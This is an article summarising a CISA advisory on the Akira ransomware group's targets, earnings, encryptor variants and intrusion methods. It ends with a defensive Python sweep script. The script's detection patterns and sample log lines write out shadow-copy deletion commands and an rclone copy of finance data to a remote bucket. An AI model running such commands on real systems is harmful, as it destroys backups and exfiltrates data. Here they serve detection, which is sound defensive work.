A recent advisory from the Cybersecurity and Infrastructure Security Agency (CISA) highlights the growing threat of the Akira ransomware group, which has rapidly become one of the most aggressive cybercrime operations targeting global businesses.
Ransomware Impact and Financial Losses
Since March 2023, Akira has compromised more than 250 organizations across North America, Europe, and Australia. According to the agency, the group collected approximately 244.17 million dollars in ransom payments by the end of September 2025.
Researchers have linked this threat group to the previously active Conti ransomware operation. Akira mainly focuses on small and medium-sized organizations across multiple sectors, making it a high-risk threat for companies with limited security budgets.
Targeted Sectors and Initial Access Methods
Akira shows a clear preference for industries that include manufacturing, education, information technology, healthcare, and financial services.
The attackers typically gain initial access through virtual private network services that lack multi-factor authentication, and by exploiting known vulnerabilities in Cisco products.
Security analysts from CISA observed that Akira threat actors continued to refine and improve their techniques throughout 2024 and 2025.
Evolution of Akira Ransomware Variants
Akira was first discovered as a Windows-based C++ encryptor that added the .akira extension to affected files.
By April 2023, the group launched a Linux variant targeting VMware ESXi servers. A few months later, in August 2023, they released the Megazord encryptor, a Rust-based version that appended the .powerranges extension.
In June 2025, Akira operators exploited CVE-2024-40766, a SonicWall flaw, which enabled them to encrypt Nutanix AHV virtual machine disk files.
Akira uses a hybrid encryption technique that combines the ChaCha20 stream cipher with RSA public-key encryption to achieve high-speed file encryption and secure key handling.
Double Extortion and Persistence Techniques
The ransomware follows a double extortion strategy in which victims face both file encryption and threats of public data exposure. Once inside a network, the attackers establish persistence by creating new domain accounts and using credential harvesting tools like Mimikatz and LaZagne to steal passwords. They also rely on legitimate remote access programs such as AnyDesk and LogMeIn to maintain long-term access without raising suspicion.
For data theft, Akira operators use tools like FileZilla, WinSCP, and RClone to transfer sensitive information to cloud storage platforms before launching encryption activities. To block system recovery, the malware uses PowerShell commands to remove Volume Shadow Copy Service backups on Windows devices. Victims receive ransom notes named fn.txt or akira_readme.txt, which direct them to a .onion site through the Tor network, where payments are demanded in Bitcoin.
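The persistence, tooling, recovery-blocking and ransom-note indicators described in the two paragraphs above can be turned into a simple offline sweep. The following Python script is an added example for this article and is not part of the CISA advisory or any Akira analysis tooling. The file names, extensions and tool names it looks for are taken from the article; the shadow-copy deletion command patterns and the use of Windows Security event ID 4720 for account creation are assumptions based on well-known Windows behaviour, not details the advisory states, and all log lines, paths and events in the script are constructed sample data.

```python
import re
from dataclasses import dataclass

# Indicators named in the article. Everything else in this file is an added
# example and not the advisory's own detection content.
RANSOM_NOTE_NAMES = {"fn.txt", "akira_readme.txt"}
ENCRYPTED_EXTENSIONS = {".akira", ".powerranges"}
TOOL_NAMES = {"anydesk", "logmein", "mimikatz", "lazagne",
              "filezilla", "winscp", "rclone"}

# Assumption: these are the commonly seen ways of deleting Volume Shadow
# Copies from a PowerShell or cmd session. The article only says Akira uses
# PowerShell for this and names no specific command.
SHADOW_COPY_PATTERNS = [
    re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I),
    re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I),
    re.compile(r"win32_shadowcopy.*\.delete\(\)", re.I),
]

# Assumption: Windows Security event 4720 ("A user account was created").
ACCOUNT_CREATED_EVENT_ID = 4720


@dataclass
class Finding:
    category: str  # shadow_copy_deletion | tool | ransom_note | encrypted_file | new_account
    evidence: str


def check_command_line(line: str) -> list[Finding]:
    """Flag shadow-copy deletion and the tools the article names in one logged command line."""
    findings = []
    if any(p.search(line) for p in SHADOW_COPY_PATTERNS):
        findings.append(Finding("shadow_copy_deletion", line))
    lowered = line.lower()
    for tool in sorted(TOOL_NAMES):
        if tool in lowered:
            findings.append(Finding("tool", f"{tool}: {line}"))
    return findings


def check_path(path: str) -> list[Finding]:
    """Flag ransom notes and files carrying the extensions Akira appends."""
    name = path.replace("\\", "/").rsplit("/", 1)[-1].lower()
    findings = []
    if name in RANSOM_NOTE_NAMES:
        findings.append(Finding("ransom_note", path))
    for ext in ENCRYPTED_EXTENSIONS:
        if name.endswith(ext):
            findings.append(Finding("encrypted_file", path))
    return findings


def check_security_event(event: dict) -> list[Finding]:
    """Flag account creation, the persistence step the article describes."""
    if event.get("EventID") == ACCOUNT_CREATED_EVENT_ID:
        who = f"{event.get('TargetUserName')} created by {event.get('SubjectUserName')}"
        return [Finding("new_account", who)]
    return []


def sweep(command_lines, paths, events) -> dict[str, int]:
    """Run every check and return the number of findings per category."""
    findings: list[Finding] = []
    for line in command_lines:
        findings.extend(check_command_line(line))
    for path in paths:
        findings.extend(check_path(path))
    for event in events:
        findings.extend(check_security_event(event))
    counts: dict[str, int] = {}
    for f in findings:
        counts[f.category] = counts.get(f.category, 0) + 1
    return counts


# Constructed sample telemetry, not real logs.
SAMPLE_COMMAND_LINES = [
    "powershell.exe -c Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_.Delete() }",
    "vssadmin.exe delete shadows /all /quiet",
    "C:\\Users\\Public\\rclone.exe copy D:\\Finance remote:bucket",
    "notepad.exe C:\\Users\\alice\\notes.txt",
]
SAMPLE_PATHS = [
    "D:\\Finance\\Q3.xlsx.akira",
    "D:\\Finance\\akira_readme.txt",
    "E:\\VMs\\web01.vmdk.powerranges",
    "C:\\Users\\alice\\Documents\\report.docx",
]
SAMPLE_EVENTS = [
    {"EventID": 4720, "TargetUserName": "svc_backup2", "SubjectUserName": "DOMAIN\\admin"},
    {"EventID": 4624, "TargetUserName": "alice", "SubjectUserName": "-"},
]

if __name__ == "__main__":
    for category, count in sorted(sweep(SAMPLE_COMMAND_LINES, SAMPLE_PATHS, SAMPLE_EVENTS).items()):
        print(f"{category}: {count}")
```

Matching on tool names and ransom-note file names is string matching that a renamed binary defeats, so the shadow-copy deletion and account-creation checks, which key on behaviour rather than names, are the ones worth wiring into real telemetry first.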